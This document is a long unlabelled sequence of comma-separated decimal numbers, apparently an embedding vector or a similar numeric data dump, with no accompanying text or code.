-0.020003728568553925, -0.026738854125142097, -0.04352961853146553, 0.013954213820397854, -0.0010611857287585735, -0.025407960638403893, 0.007830760441720486, 0.026456544175744057, -0.001915679662488401, 0.01774524338543415, 0.006553641054779291, 0.0028264676220715046, -0.0236872099339962, -0.006681352853775024, -0.021737921983003616, 0.011218489147722721, -0.011682284995913506, 0.03290935978293419, 0.013066951185464859, -0.024991218000650406, -0.02692706137895584, 0.020568350329995155, -0.013584521599113941, 0.015634633600711823, 0.016347132623195648, -0.02160348929464817, 0.00038292587851174176, -0.014357514679431915, -0.0025559200439602137, -0.034845203161239624, 0.0018098130822181702, 0.014034873805940151, -0.052536673843860626, -0.00717203551903367, 0.0355980321764946, -0.00398595817387104, 0.0016636165091767907, -0.0023458674550056458, 0.008623919449746609, 0.0049169110134243965, 0.0163202453404665, -0.014088647440075874, -0.02275961823761463, 0.030086252838373184, -0.03670039027929306, 0.004772394895553589, -0.005249634385108948, -0.026832958683371544, -0.04568055644631386, 0.01566152088344097, -0.008933116681873798, -0.07200266420841217, -0.0029306537471711636, 0.04998243600130081, -0.038609348237514496, 0.002624817192554474, -0.0066309403628110886, 0.0015174199361354113, -0.01605137810111046, -0.006977106910198927, -0.004728703759610653, -0.04323386400938034, -0.010008585639297962, 0.046030085533857346, 0.04003434255719185, -0.006651105359196663, -0.008946560323238373, -0.007010715082287788, 0.013389592058956623, -0.003029798623174429, -0.014720485545694828, 0.009430521167814732, 0.025703715160489082, 0.042803678661584854, 0.0003327233134768903, 0.009679223410785198, -0.01810821332037449, 0.011016838252544403, -0.010539598762989044, 0.007662718649953604, 0.005276521202176809, -0.0445244275033474, -0.0355980321764946, 0.0443362221121788, 0.0007700527785345912, -0.03438812866806984, 0.014895249158143997, 0.024682018905878067, -0.008563424460589886, -0.011285705491900444, 0.02903767116367817, 0.0027777354698628187, -0.006745208986103535, 0.004419506527483463, -0.038636233657598495, 0.0018988754600286484, -0.04175509512424469, -0.018135100603103638, -0.0025155898183584213, -0.013349262066185474, -0.009235592558979988, -0.0049169110134243965, -0.01434407103806734, 0.021227074787020683, 0.02314947545528412, -0.011541130021214485, 0.0414593406021595, 0.008166844956576824, -0.019479436799883842, 0.00783748272806406, 0.00429515540599823, -0.028204182162880898, -0.0029541796538978815, -0.022746175527572632, 0.027128713205456734, -0.011883935891091824, 0.011063890531659126, 0.01125881914049387, -0.01570185087621212, -0.006788899656385183, 0.011184880509972572, -0.04527725651860237, -0.02720937319099903, -0.03581312671303749, -0.010149741545319557, -0.01301989983767271, 0.022705845534801483, -0.0019896181765943766, 0.030946629121899605, -0.038367364555597305, 0.0028886431828141212, 0.025609612464904785, -0.001357779954560101, 0.0222622137516737, -0.03661973029375076, 0.016521897166967392, -0.045761216431856155, -0.008200453594326973, 0.003817915916442871, 0.023297352716326714, -0.009921204298734665, 0.004685013089329004, 0.001077989931218326, 0.00734007777646184, 0.023888861760497093, -0.035140957683324814, 0.026792628690600395, 0.05234846845269203, -0.015486757270991802, -0.012993013486266136, 0.08705923706293106, -0.018807269632816315, 0.021280847489833832, -0.01463982556015253, -0.02992493286728859, -0.010579928755760193, -0.006590609904378653, 0.026133902370929718, -0.04559989646077156, -0.04414801299571991, 0.028634369373321533, -0.003606182988733053, 0.025354187935590744, -0.025165980681777, -0.013376149348914623, -0.007998802699148655, -0.04831545799970627, 0.056408364325761795, -0.007017436902970076, -0.01871316507458687, -0.007293025963008404, 0.021778251975774765, -0.04296499863266945, 0.000893983815331012, 0.04584187641739845, 0.008133236318826675, 0.022880608215928078, 0.035624921321868896, 0.017610808834433556, -0.001602281117811799, -0.017704913392663002, -0.014989352785050869, 0.00230049598030746, 0.005814255680888891, -0.02187235653400421, 0.002218155423179269, 0.010868960991501808, 0.005494975950568914, 0.021778251975774765, 0.012468721717596054, -0.017637696117162704, -0.009732997044920921, 0.027720220386981964, -0.013288767077028751, 0.0533701628446579, -0.03468388319015503, 0.006563723552972078, -0.022047119215130806, -0.03132304176688194, 0.0385017991065979, 0.017651138827204704, -0.02282683551311493, 0.023176362738013268, 0.012159524485468864, 0.026779184117913246, 0.017301611602306366, -0.05132677033543587, 0.005064788274466991, 0.009759883396327496, -0.0222487710416317, 0.04199707508087158, -0.0022584854159504175, -0.04113670065999031, -0.034549448639154434, 0.008919673040509224, -0.031242381781339645, -0.04119047150015831, 0.004762312397360802, 0.09539412707090378, 0.015137230046093464, -0.011023559607565403, 0.03782963007688522, -0.04105604067444801, 0.008657528087496758, -0.04656782001256943, 0.017946893349289894, -0.02492400072515011, 0.020259153097867966, 0.03395794332027435, 0.012031812220811844, -0.013524025678634644, 0.027585787698626518, -0.023566219955682755, 0.000742745993193239, -0.019398776814341545, -0.0221681110560894, 0.031565021723508835, -0.009652337059378624, 0.01571529544889927, 0.010573207400739193, 0.009450686164200306, 0.0003304127312730998, 0.016185812652111053, -0.01170917134732008, 0.008556702174246311, -0.019331559538841248, 0.049606021493673325, 0.008939838036894798, 0.006990550085902214, 0.026537204161286354, 0.021428724750876427, 0.013645016588270664, -0.009437242522835732, -0.04589565098285675, 0.0005793250747956336, -0.004352289717644453, 0.026147346943616867, -0.006943498272448778, -0.025233197957277298, -0.04482018202543259, -0.004328764043748379, -0.0177990160882473, 0.002251763828098774, 0.025004660710692406, 0.02074311301112175, -0.009961534291505814, 0.0077164918184280396, -0.014276854693889618, -0.03667350113391876, -0.021536272019147873, -0.00841554719954729, 0.011473912745714188, -0.029763612896203995, -0.03207587078213692, 0.02753201313316822, 0.00007005254155956209, -0.060548920184373856, 0.020017171278595924, -0.023888861760497093, -0.029817385599017143, -0.029198991134762764, 0.035463597625494, -0.006059597246348858, -0.00665782717987895, 0.02371409721672535, -0.04799281805753708, 0.012845136225223541, 0.013806336559355259, 0.01574218086898327, -0.0011410056613385677, -0.02188579924404621, 0.02461480349302292, -0.02187235653400421, 0.023162920027971268, 0.02691361866891384, 0.015930388122797012, -0.008798683062195778, 0.0005024457932449877, 0.02453414350748062, 0.006341907661408186, -0.012199854478240013, 0.03788340464234352, -0.05431119725108147, 0.014478504657745361, -0.04858432337641716, -0.058774396777153015, 0.008039132691919804, 0.02876880206167698, 0.02817729488015175, 0.029440971091389656, -0.003952349536120892, -0.009961534291505814, 0.024050181731581688, 0.007279582787305117, 0.02903767116367817, -0.0033524392638355494, -0.015217890031635761, -0.008832291699945927, 0.022853722795844078, -0.02341834269464016, -0.038931988179683685, 0.02103886753320694, 0.0049169110134243965, -0.00016825212514959276, 0.004029648844152689, 0.018256090581417084, 0.010176627896726131, 0.0444168820977211, -0.041647545993328094, -0.02751857042312622, -0.02074311301112175, -0.005219386890530586, -0.03317822515964508, 0.005663017742335796, -0.03799095377326012, 0.0003738936211448163, -0.03648529574275017, -0.00672840466722846, -0.03401171416044235, 0.0222622137516737, 0.008408824913203716, 0.004234660416841507, 0.015029682777822018, -0.00947757251560688, -0.00006789949839003384, 0.021401839330792427, 0.03293624520301819, 0.0037070082034915686, 0.01152768637984991, 0.014048317447304726, 0.018887929618358612, 0.00902049895375967, 0.005740317050367594, 0.030140025541186333, -0.0030247573740780354, 0.014801145531237125, 0.012361175380647182, -0.004238021094352007, 0.04266924411058426, 0.014478504657745361, 0.00391874136403203, -0.03516784682869911, 0.03401171416044235, -0.027693333104252815, 0.04178198054432869, 0.00230217631906271, 0.033931054174900055, -0.013597964309155941, 0.019707974046468735, -0.03575935214757919, 0.028822576627135277, -0.02927965112030506, -0.02101198025047779, -0.007077932357788086, -0.03046266734600067, 0.011689006350934505, -0.010687476024031639, 0.008872621692717075, 0.013712232932448387, -0.001149407820776105, -0.01345680933445692, 0.009672502055764198, -0.0010048915864899755, -0.004016205668449402, 0.008388659916818142, -0.00696366373449564, 0.015822840854525566, 0.015446427278220654, -0.0281235221773386, 0.02133462205529213, 0.023324239999055862, -0.04049141705036163, -0.04022255167365074, 0.019062692299485207, -0.007622388657182455, 0.0118368836119771, -0.0206893403083086, -0.02044736035168171, 0.023257022723555565, 0.022329431027173996, -0.001612363732419908, -0.022611740976572037, 0.011675563640892506, 0.0011485675349831581, -0.029709838330745697, 0.007951751351356506, 0.0443362221121788, 0.019345004111528397, -0.03414614871144295, 0.007830760441720486, -0.002715559909120202, 0.007346799597144127, -0.02159004472196102, 0.01840396784245968, 0.02457447350025177, 0.02074311301112175, 0.02130773477256298, 0.0012292277533560991, -0.006177226547151804, 0.00814667996019125, 0.016226142644882202, 0.007044323720037937, -0.010398443788290024, 0.0015367447631433606, 0.0035692136734724045, -0.0009091076208278537, -0.018135100603103638, -0.02788154035806656, 0.02425183169543743, -0.0062074740417301655, -0.013073673471808434, 0.0018703083042055368, -0.00018117035506293178, 0.00816012267023325, 0.007487954571843147, 0.04229282960295677, 0.022880608215928078, 0.02874191664159298, -0.0051857782527804375, 0.020944764837622643, -0.011742779985070229, -0.03516784682869911, -0.027773993089795113, 0.012777918949723244, -0.03530227765440941, 0.00889278668910265, 0.0016846217913553119, -0.021751366555690765, 0.009746440686285496, -0.019103022292256355, -0.023162920027971268, -0.022584855556488037, -0.02165726199746132, 0.013806336559355259, 0.040679626166820526, 0.027128713205456734, -0.004412784706801176, -0.024050181731581688, 0.03425369784235954, 0.02632210962474346, -0.03210275620222092, -0.011930987238883972, -0.020864102989435196, -0.03637774661183357, -0.008267669938504696, -0.015311993658542633, 0.024937443435192108, -0.023794757202267647, -0.019412219524383545, -0.005205943249166012, 0.03651218116283417, 0.014801145531237125, 0.017718356102705002, -0.035624921321868896, 0.008059297688305378, 0.002829828532412648, 0.03465699777007103, 0.0035961002577096224, -0.004678291268646717, 0.047804608941078186, 0.04315320402383804, 0.013080394826829433, 0.020259153097867966, 0.021227074787020683, 0.03425369784235954, -0.01390044018626213, -0.007212365977466106, 0.025703715160489082, 0.005101757124066353, -0.01597071811556816, 0.004745508078485727, 0.05183761939406395, 0.009840543381869793, -0.00010087775444844738, -0.021469054743647575, -0.003038200782611966, -0.004906828515231609, -0.020259153097867966, -0.0237409844994545, 0.01830986514687538, 0.01419619470834732, -0.026577534154057503, 0.023552777245640755, 0.013725676573812962, -0.04581499099731445, 0.023028485476970673, -0.026725411415100098, -0.009719553403556347, 0.013295488432049751, 0.027747107669711113, 0.01689831167459488, -0.029440971091389656, -0.017852790653705597, 0.03672727569937706, -0.04820790886878967, 0.023754427209496498, -0.007810595445334911, 0.01494902279227972, 0.013140889815986156, -0.0066343010403215885, 0.0023609912022948265, -0.024776123464107513, 0.005461367312818766, -0.04624518007040024, 0.030919741839170456, 0.011689006350934505, 0.028553709387779236, -0.026012912392616272, 0.024803010746836662, -0.008045854046940804, -0.005585718434303999, 0.00012057018466293812, -0.0011821759399026632, -0.020904434844851494, 0.007918142713606358, -0.002611373784020543, -0.011769667267799377, 0.014854919165372849, -0.004701817408204079, -0.026832958683371544, -0.024829896166920662, 0.0031255825888365507, -0.016683217138051987, 0.009786770679056644, -0.004513610154390335, -0.01865939237177372, -0.07141116261482239, 0.023257022723555565, 0.021979903802275658, -0.011447026394307613, 0.009356582537293434, 0.00479928171262145, 0.010042194277048111, -0.020958207547664642, -0.00770977046340704, -0.0041035874746739864, -0.0010191751644015312, 0.022020233795046806, 0.002438290510326624, 0.008791961707174778, 0.008428990840911865, 0.015137230046093464, -0.001045221695676446, -0.005192500073462725, -0.014720485545694828, -0.0014443215914070606, -0.019062692299485207, 0.004611074458807707, -0.005115200765430927, 0.007454346399754286, 0.019963398575782776, -0.009423799812793732, 0.014182751066982746, 0.006765373982489109, 0.006177226547151804, 0.020084388554096222, -0.027142155915498734, -0.02427871897816658, -0.012556103989481926, 0.021845469251275063, -0.022100893780589104, 0.018726607784628868, -0.012737588956952095, -0.002391238696873188, -0.016763877123594284, -0.008798683062195778, 0.010492547415196896, 0.02548862248659134, 0.01170244999229908, 0.04801970347762108, -0.022423533722758293, 0.01723439432680607, -0.002438290510326624, -0.002056834986433387, -0.003525522770360112, -0.013792893849313259, 0.00994809065014124, 0.02544829249382019, -0.050520170480012894, 0.012952683493494987, -0.00042388614383526146, 0.004096865653991699, 0.013967657461762428, 0.0028735194355249405, 0.0325598306953907, -0.0266313087195158, 0.028957009315490723, 0.024803010746836662, -0.0071653141640126705, 0.009981699287891388, 0.008973446674644947, -0.020380143076181412, 0.005239551886916161, -0.025219755247235298, -0.013510582968592644, 0.06259231269359589, -0.00754172820597887, 0.0103513915091753, -0.042239055037498474, 0.01716717891395092, -0.009719553403556347, -0.015486757270991802, -0.033931054174900055, -0.007857647724449635, 0.009269201196730137, -0.02871502935886383, -0.013093838468194008, -0.03764142468571663, -0.007911420427262783, -0.02543484792113304, 0.01953321136534214, -0.007864369079470634, 0.026174234226346016, 0.010916013270616531, -0.029521631076931953, -0.011278984136879444, 0.023606549948453903, 0.023270465433597565, -0.018135100603103638, -0.021832026541233063, 0.01139325276017189, -0.006506589241325855, -0.007111540529876947, -0.0385824590921402, 0.011487356387078762, 0.02396952174603939, -0.03742633014917374, -0.037722084671258926, 0.017032744362950325, 0.021200187504291534, -0.00311381951905787, 0.00696366373449564, 0.018121657893061638, -0.004779116716235876, -0.03664661571383476, 0.006866198964416981, -0.002503826981410384, -0.015298550017178059, 0.022302543744444847, -0.00977332703769207, 0.001427517388947308, -0.022074006497859955, 0.019116466864943504, 0.013544190675020218, 0.0027222814969718456, -0.012952683493494987, -0.02753201313316822, -0.0015350643079727888, -0.014693599194288254, -0.02130773477256298, 0.004987488966435194, -0.0003199100901838392, 0.01806788332760334, 0.028042860329151154, 0.014048317447304726, -0.011655398644506931, 0.03355463966727257, -0.018780382350087166, -0.00666118785738945, 0.004197691101580858, -0.014451618306338787, 0.0006994751165620983, 0.013698790222406387, 0.017395716160535812, 0.008852456696331501, -0.01689831167459488, -0.028231067582964897, 0.04261546954512596, -0.023619994521141052, -0.007864369079470634, 0.004238021094352007, 0.02723625861108303, -0.0032869030255824327, 0.00510847894474864, -0.01051943376660347, 0.056139495223760605, 0.011231931857764721, -0.004698456265032291, -0.029709838330745697, 0.019479436799883842, 0.005333655513823032, 0.025528952479362488, 0.0043220422230660915, -0.015486757270991802, 0.00784420408308506, 0.02839238941669464, -0.009296087548136711, 0.0052261087112128735, -0.03960415720939636, -0.008738188073039055, -0.025354187935590744, -0.034845203161239624, -0.011238654144108295, 0.011924265883862972, 0.015406097285449505, -0.00026424616225995123, -0.011117663234472275, -0.0010174947092309594, 0.010546320118010044, 0.006459537427872419, -0.017032744362950325, 0.022033676505088806, -0.02898389659821987, -0.0006242762901820242, -0.020662453025579453, -0.012683815322816372, 0.008650805801153183, -0.002680271165445447, -0.00436573289334774, 0.03290935978293419, 0.0064696199260652065, 0.0016568948049098253, -0.013604686595499516, 0.012838414870202541, -0.030731534585356712, -0.0009763244306668639, -0.004782477393746376, -0.02372753992676735, 0.03971170261502266, -0.015406097285449505, 0.020044058561325073, -0.02254452370107174, 0.023270465433597565, -0.011037003248929977, 0.00828783493489027, -0.0031306238379329443, 0.014572608284652233, 0.02427871897816658, -0.0177855733782053, -0.006298216991126537, -0.002787817968055606, -0.011144550517201424, 0.028903236612677574, -0.01094962190836668, 0.0155674172565341, -0.0036196261644363403, 0.009074271656572819, 0.02690017595887184, -0.0192105695605278, -0.02196645922958851, 0.017946893349289894, -0.010055637918412685, -0.011944430880248547, 0.015177560038864613, 0.024695463478565216, 0.005353820510208607, -0.00018537140567786992, -0.000024759949155850336, 0.010095967911183834, 0.02423838898539543, -0.04003434255719185, -0.020272595807909966, -0.006338546983897686, -0.031000401824712753, -0.005333655513823032, 0.0025105485692620277, -0.011877213604748249, -0.022369761019945145, 0.017557036131620407, -0.017597366124391556, 0.02161693200469017, 0.019734861329197884, 0.011379809118807316, 0.014801145531237125, -0.0019341643201187253, -0.02669852413237095, -0.008986890316009521, -0.0074341814033687115, 0.014653269201517105, -0.06049514561891556, 0.000041249077185057104, -0.03199521079659462, -0.022463863715529442, -0.002260165987536311, 0.03175323083996773, 0.01537921093404293, 0.011137828230857849, -0.011514242738485336, 0.03282869979739189, -0.00048018022789619863, -0.017328498885035515, -0.008247504942119122, 0.00429851608350873, -0.010371556505560875, 0.0014678474981337786, 0.037775859236717224, 0.010667311027646065, 0.005397511180490255, 0.003565852763131261, 0.03022068738937378, 0.021778251975774765, -0.008496207185089588, -0.005458006635308266, -0.01227379310876131, -0.003680121386423707, 0.004096865653991699, -0.03226407989859581, 0.0008948240429162979, -0.012925796210765839, -0.024668576195836067, -0.02107919752597809, -0.011984760873019695, -0.002900406252592802, -0.030113140121102333, 0.023821644484996796, 0.023781314492225647, -0.013954213820397854, -0.013214828446507454, 0.023189805448055267, 0.013073673471808434, 0.023337682709097862, -0.016468122601509094, 0.0024433317594230175, 0.009423799812793732, 0.004143917467445135, 0.022907495498657227, -0.0023710737004876137, 0.03054332733154297, 0.006486424244940281, 0.003170953830704093, 0.0012905631447210908, -0.005444562993943691, 0.011628511361777782, 0.0016535340109840035, 0.02107919752597809, 0.0010931136785075068, -0.034845203161239624, 0.008516372181475163, 0.000304786313790828, -0.008113071322441101, -0.007481233216822147, 0.022396648302674294, 0.0038011115975677967, 0.012327566742897034, 0.0016039615729823709, 0.04374471306800842, 0.01200492586940527, -0.01419619470834732, -0.042239055037498474, 0.02700772136449814, -0.031188609078526497, -0.03022068738937378, 0.0021778251975774765, 0.030677760019898415, 0.005111840087920427, -0.005246273707598448, -0.0057134306989610195, 0.0019560097716748714, -0.010593372397124767, -0.00399267952889204, -0.00875835306942463, 0.017086518928408623, -0.01602449268102646, 0.01833675056695938, -0.0013308932539075613, 0.053155068308115005, 0.018498070538043976, -0.024493813514709473, -0.015634633600711823, 0.008832291699945927, -0.018565287813544273, 0.007461068220436573, -0.007420737762004137, 0.006956941913813353, -0.008684414438903332, -0.007528285030275583, -0.01810821332037449, -0.003807833418250084, -0.01597071811556816, -0.015607748180627823, 0.02817729488015175, 0.004120391793549061, 0.000846932060085237, 0.008738188073039055, 0.0022736091632395983, -0.01712684892117977, -0.015043126419186592, 0.021845469251275063, -0.027384135872125626, 0.020541463047266006, -0.0059386068023741245, -0.017261281609535217, 0.00011731437552953139, -0.00842226855456829, 0.006331825163215399, -0.003328913589939475, -0.008442433550953865, -0.03734567016363144, 0.014182751066982746, 0.0010872322600334883, -0.01230740174651146, -0.01051271241158247, -0.015056570060551167, -0.014707041904330254, -0.020541463047266006, -0.019318116828799248, -0.037157464772462845, -0.0036263479851186275, -0.005699987057596445, 0.01392732746899128, 0.07603567838668823, -0.01864594779908657, -0.01895514503121376, 0.001370383077301085, -0.020366698503494263, -0.0071249837055802345, -0.03019380010664463, -0.01170917134732008, -0.02550206519663334, 0.008563424460589886, 0.038044724613428116, -0.016158925369381905, 0.005810895003378391, 0.01438440103083849, -0.009827100671827793, 0.00336420233361423, 0.00012382600107230246, -0.004258186090737581, -0.0005511780036613345, 0.00236771279014647, 0.01925089955329895, -0.0027021165005862713, 0.0177990160882473, -0.014693599194288254, 0.028930123895406723, 0.0045909094624221325, -0.021778251975774765, -0.0015249818097800016, -0.015930388122797012, -0.005679822061210871, -0.0034650275483727455, -0.004500166513025761, -0.014666711911559105, 0.0027827767189592123, 0.002584487199783325, -0.002102206228300929, 0.022732730954885483, -0.01980207860469818, -0.020904434844851494, 0.0007633311324752867, 0.0022971350699663162, -0.012730867601931095, -0.02371409721672535, -0.0029760252218693495, 0.009121323935687542, -0.016978971660137177, 0.03172634169459343, -0.004779116716235876, -0.008442433550953865, 0.026806071400642395, -0.010633702389895916, 0.009222148917615414, 0.009376747533679008, -0.00422457791864872, 0.003428058233112097, 0.017261281609535217, 0.030355120077729225, 0.02304193004965782, 0.017530148848891258, -0.011346200481057167, -0.017906563356518745, 0.02164381928741932, -0.014142421074211597, 0.01038500014692545, 0.00317935599014163, -0.012293958105146885, -0.010297617875039577, 0.01654878258705139, -0.02841927483677864, 0.017839346081018448, 0.008523093536496162, -0.0007650115294381976, -0.03936217352747917, -0.021227074787020683, 0.018753495067358017, 0.033285774290561676, -0.009934647008776665, 0.01957354135811329, -0.0021290930453687906, -0.0014644867042079568, 0.032613605260849, 0.0415668860077858, -0.024036739021539688, 0.03169945627450943, 0.004570744466036558, 0.0047522298991680145, -0.022450421005487442, -0.014478504657745361, -0.010364835150539875, -0.005064788274466991, 0.011662119999527931, -0.01625302992761135, 0.0066343010403215885, -0.025125650689005852, 0.025112207978963852, 0.01805444061756134, 0.021791696548461914, -0.01468015555292368, 0.0033675632439553738, 0.004560661967843771, -0.0052261087112128735, -0.0018064522882923484, 0.0005314330337569118, -0.02279994823038578, -0.02185891382396221, 0.014989352785050869, -0.010687476024031639, 0.037722084671258926, -0.03906642273068428, -0.008502928540110588, -0.028849463909864426, -0.00777698727324605, 0.029817385599017143, -0.023794757202267647, 0.00516897439956665, 0.014263411052525043, 0.01660255715250969, -0.020541463047266006, -0.011245375499129295, -0.013745841570198536, -0.00703760189935565, -0.002219835761934519, 0.04205084964632988, -0.0009738038061186671, 0.007077932357788086, 0.007198922336101532, -0.005373985506594181, -0.022329431027173996, 0.03145747631788254, -0.004150639288127422, 0.027155598625540733, 0.0005595801048912108, 0.007582058198750019, -0.005797451362013817, 0.006177226547151804, -0.024345936253666878, 0.02491055615246296, 0.00036171055398881435, -0.01564807817339897, -0.0021206908859312534, -0.033016905188560486, 0.012287236750125885, 0.028499934822320938, -0.0028163851238787174, 0.011769667267799377, 0.0075955018401145935, -0.012051977217197418, 0.012616598978638649, 0.014088647440075874, 0.01685798168182373, -0.01157473772764206, -0.04264235496520996, 0.0005293325521051884, 0.03530227765440941, -0.023015042766928673, 0.01661599986255169, 0.04393291845917702, -0.01595727540552616, 0.008314722217619419, -0.0005671419785358012, -0.007514841388911009, -0.001393068814650178, 0.0155674172565341, -0.00946412980556488, 0.016145482659339905, 0.03344709426164627, 0.025044990703463554, -0.03471077233552933, -0.03134993091225624, -0.007770265452563763, 0.014760815538465977, 0.021751366555690765, 0.0028029417153447866, -0.0015636314637959003, 0.050466395914554596, 0.009215427562594414, -0.025999469682574272, 0.03132304176688194, 0.0222622137516737, -0.02165726199746132, 0.003345717675983906, 0.010479103773832321, 0.01468015555292368, -0.005652935244143009, -0.013127447105944157, -0.01836363784968853, 0.007198922336101532, 0.00797863770276308, -0.03680793568491936, 0.01574218086898327, 0.005011014640331268, 0.03376973420381546, -0.014263411052525043, -0.02492400072515011, -0.023230135440826416, -0.024198058992624283, 0.0207027830183506, 0.00949773844331503, 0.0010359793668612838, -0.007353520952165127, 0.015607748180627823, -0.0035624918527901173, 0.008704579435288906, -0.000353728566551581, -0.002125732135027647, -0.003969153854995966, 0.0008271870901808143, -0.006627579219639301, -0.021509384736418724, -0.001288882689550519, 0.007750100456178188, 0.0064696199260652065, 0.003461666638031602, -0.0024903835728764534, 0.02193957380950451, 0.005642852745950222, 0.0010384999914094806, -0.000060757713072234765, -0.01896858960390091, -0.03871689364314079, 0.0013292127987369895, 0.009571676142513752, 0.007071210537105799, 0.028526822105050087, 0.006570444907993078, 0.00311381951905787, 0.01599760539829731, -0.0063654338009655476, -0.0005826858687214553, 0.017086518928408623, -0.03237162530422211, 0.015903502702713013, 0.017704913392663002, 0.007346799597144127, 0.011809997260570526, -0.028580596670508385, -0.01423652470111847, -0.0003583497309591621, -0.011178159154951572, 0.014357514679431915, -0.011850327253341675, -0.01051943376660347, -0.025018103420734406, 0.0078038740903139114, -0.019412219524383545, -0.0000776144297560677, -0.00616042222827673, -0.016454679891467094, -0.00373725569806993, 0.01744948886334896, 0.0024450120981782675, 0.0033104289323091507, 0.012482165358960629, 0.007420737762004137, -0.010889125987887383, -0.00005771194992121309, -0.007669440004974604, 0.010835353285074234, 0.010862239636480808, -0.011252096854150295, -0.005340376868844032, -0.013369427062571049, -0.009726274758577347, 0.004150639288127422, -0.0110974982380867, 0.019734861329197884, 0.0006301577668637037, -0.005421037320047617, 0.02314947545528412, 0.008341608569025993, 0.01494902279227972, -0.017731798812747, 0.016454679891467094, -0.02633555419743061, -0.0050782314501702785, 0.0010519433999434114, 0.010237122885882854, -0.008435712195932865, -0.0018837515963241458, -0.011252096854150295, -0.002507187658920884, 0.03613576665520668, 0.018551845103502274, -0.022571410983800888, -0.025058433413505554, -0.008381938561797142, -0.02102542482316494, -0.018847599625587463, -0.02691361866891384, 0.01392732746899128, -0.004567383788526058, 0.0014930538600310683, -0.002251763828098774, -0.03075842186808586, 0.010136297903954983, -0.001241830876097083, -0.015580860897898674, 0.021200187504291534, -0.011675563640892506, 0.0018955145496875048, 0.0072258091531693935, 0.016669774428009987, 0.01723439432680607, -0.002813024213537574, -0.01723439432680607, -0.0077568222768604755, -0.023176362738013268, -0.007131705526262522, -0.012643485330045223, 0.0011242014588788152, 0.01287874486297369, 0.009235592558979988, -0.015311993658542633, -0.029709838330745697, 0.011857048608362675, 0.001509017776697874, 0.012374618090689182, -0.003589378669857979, -0.0028365501202642918, -0.0009838863043114543, 0.015096900053322315, -0.018565287813544273, -0.033043794333934784, 0.0009158293250948191, 0.004207773599773645, -0.0010376598220318556, 0.019425664097070694, -0.00858358945697546, -0.02222188375890255, -0.009672502055764198, 0.023875417187809944, 0.014169307425618172, 0.020931320264935493, -0.007057766895741224, 0.009296087548136711, -0.015352323651313782, 0.03317822515964508, -0.015876615419983864, 0.009759883396327496, 0.004120391793549061, -0.03882443904876709, 0.018444297835230827, -0.0014418009668588638, 0.035087183117866516, 0.014438174664974213, 0.017019301652908325, 0.019976841285824776, 0.005266438703984022, 0.0043825372122228146, -0.022275656461715698, -0.01066058874130249, -0.007884534075856209, -0.021415282040834427, 0.020312925800681114, 0.02906455658376217, 0.019923068583011627, 0.01362485159188509, -0.012824971228837967, 0.003495275042951107, -0.026201119646430016, 0.010042194277048111, -0.0025239919777959585, -0.0096052847802639, -0.01891481503844261, 0.003982597030699253, 0.00398595817387104, -0.013846666552126408, 0.014532278291881084, 0.024103954434394836, -0.0048564160242676735, 0.00009840964048635215, 0.008684414438903332, 0.02304193004965782, 0.0034398213028907776, -0.02191268652677536, -0.008119792677462101, 0.03129615634679794, -0.0026382606010884047, -0.016736989840865135, 0.021374952048063278, 0.019613871350884438, -0.00003880721487803385, 0.014518835581839085, -0.002900406252592802, -0.005034540314227343, 0.0052429125644266605, -0.015809398144483566, 0.010297617875039577, -0.025058433413505554, 0.007205644156783819, -0.005494975950568914, -0.0013443365460261703, 0.022396648302674294, 0.012764476239681244, 0.008872621692717075, -0.0068393126130104065, 0.015890058130025864, 0.017718356102705002, -0.00109059305395931, -0.021280847489833832, -0.014666711911559105, 0.005417676642537117, 0.01627991534769535, 0.013739120215177536, 0.019963398575782776, 0.032183416187763214, 0.00872474443167448, -0.00845587719231844, 0.03161879628896713, -0.00990776065737009, 0.010143019258975983, 0.011910822242498398, -0.009652337059378624, -0.010848795995116234, -0.009054106660187244, 0.004560661967843771, -0.011023559607565403, 0.004147278144955635, -0.01288546621799469, 0.004890024196356535, 0.0023626715410500765, -0.0060999272391200066, -0.03161879628896713, -0.0384749136865139, 0.0005726033705286682, -0.015540530905127525, 0.03406548872590065, -0.007676161825656891, -0.002774374559521675, -0.009712832048535347, 0.014586051926016808, 0.00010623409616528079, 0.00045203318586573005, -0.0009292726754210889, -0.009524624794721603, -0.006714961025863886, 0.0018434216035529971, 0.0028617565985769033, -0.020501133054494858, 0.03398482874035835, 0.02132117748260498, -0.02874191664159298, -0.0140752037987113, -0.0039052977226674557, -0.02605324238538742, -0.005699987057596445, -0.02571715973317623, -0.006029349751770496, -0.0006940137827768922, -0.002033309079706669, 0.006553641054779291, 0.02431904897093773, 0.007111540529876947, 0.016696659848093987, -0.005827699322253466, -0.008966725319623947, -0.009188540279865265, 0.008220618590712547, -0.0206758975982666, 0.006711600348353386, 0.023808201774954796, -0.007017436902970076, -0.0013384551275521517, 0.009269201196730137, 0.016400907188653946, -0.005051344633102417, -0.013369427062571049, 0.014989352785050869, 0.0005406753625720739, -0.025260085240006447, 0.012609877623617649, 0.011621790006756783, 0.01139325276017189, 0.010613537393510342, -0.008052576333284378, -0.004483362659811974, -0.015580860897898674, -0.029118331149220467, 0.005703348200768232, -0.013335819356143475, -0.0044867233373224735, 0.015406097285449505, 0.007830760441720486, -0.0032297687139362097, -0.007481233216822147, 0.027115268632769585, 0.016414349898695946, 0.01835019513964653, 0.002413084264844656, 0.002438290510326624, -0.001125881914049387, 0.006446093786507845, -0.017341941595077515, -0.005898276809602976, -0.0003041561576537788, 0.0038481634110212326, 0.017247838899493217, 0.000354148680344224, 0.0028869628440588713, -0.03457633778452873, 0.0005032860208302736, -0.02160348929464817, 0.030032480135560036, 0.003436460392549634, -0.004285072907805443, -0.012872022576630116, 0.002626497531309724, 0.008254226297140121, 0.0014686876675114036, -0.0019459271570667624, 0.00578064750880003, -0.003308748360723257, -0.008630640804767609, -0.01899547688663006, 0.015043126419186592, 0.0012914033140987158, 0.007561893202364445, -0.0038616068195551634, -0.017678026109933853, -0.012919074855744839, -0.0007797152502462268, -0.004086783155798912, -0.0063082994893193245, -0.008966725319623947, -0.005044623278081417, 0.0010040514171123505, 0.0266313087195158, 0.008805404417216778, -0.004574105143547058, -0.017382271587848663, 0.014733929187059402, 0.0018770300084725022, -0.011500799097120762, 0.0025122289080172777, -0.01722095161676407, 0.029763612896203995, 0.00829455628991127, -0.0009158293250948191, -0.027411023154854774, -0.021428724750876427, -0.007400572765618563, -0.008798683062195778, 0.015527087263762951, -0.009067550301551819, 0.0036733997985720634, -0.013127447105944157, -0.01349713932722807, 0.00696366373449564, -0.01316105481237173, 0.0014300380134955049, 0.014021430164575577, 0.012831692583858967, -0.002566002542153001, -0.0033121092710644007, 0.014572608284652233, 0.0067384871654212475, 0.018269535154104233, -0.006385598797351122, 0.009128045290708542, 0.014330628328025341, 